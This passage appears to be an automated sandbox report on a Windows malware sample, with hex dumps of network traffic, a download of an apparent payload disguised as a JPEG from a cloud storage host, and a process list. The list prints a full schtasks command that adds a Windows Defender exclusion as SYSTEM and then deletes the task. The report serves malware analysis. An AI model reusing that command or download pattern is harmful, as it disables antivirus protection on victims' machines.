                                                  2025-01-02 11:15:36 UTC4096INData Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d
                                                  Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                  2025-01-02 11:15:36 UTC4096INData Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c
                                                  Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                  2025-01-02 11:15:36 UTC4096INData Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71
                                                  Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
                                                  2025-01-02 11:15:36 UTC4096INData Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59
                                                  Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
                                                  2025-01-02 11:15:36 UTC4096INData Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3
                                                  Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
                                                  2025-01-02 11:15:36 UTC4096INData Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3
                                                  Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.649997118.178.60.94436196C:\Users\user\Documents\sgH8Ps.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:15:47 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:15:47 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:15:47 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 366410
                                                  Connection: close
                                                  x-oss-request-id: 67767563FE87B7303974F8E2
                                                  Accept-Ranges: bytes
                                                  ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                  Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 5641369857548672686
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                  x-oss-server-time: 3
                                                  2025-01-02 11:15:47 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-02 11:15:47 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60
                                                  Data Ascii: ```````````````````````````````````````````````````````````````
                                                  2025-01-02 11:15:47 UTC4096INData Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5
                                                  Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
                                                  2025-01-02 11:15:47 UTC4096INData Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f
                                                  Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                                  2025-01-02 11:15:47 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5
                                                  Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                  2025-01-02 11:15:47 UTC4096INData Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20
                                                  Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                                  2025-01-02 11:15:48 UTC4096INData Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f
                                                  Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                  2025-01-02 11:15:48 UTC4096INData Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac
                                                  Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                  2025-01-02 11:15:48 UTC4096INData Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d
                                                  Data Ascii: jebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
                                                  2025-01-02 11:15:48 UTC4096INData Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32
                                                  Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:06:13:18
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Desktop\45631.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\45631.exe"
                                                  Imagebase:0x140000000
                                                  File size:31'614'976 bytes
                                                  MD5 hash:71FB431D4793BB51CE762DC5D719A730
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:06:14:22
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Documents\sgH8Ps.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Documents\sgH8Ps.exe
                                                  Imagebase:0x140000000
                                                  File size:133'136 bytes
                                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:06:15:01
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Documents\sgH8Ps.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Documents\sgH8Ps.exe
                                                  Imagebase:0x140000000
                                                  File size:133'136 bytes
                                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
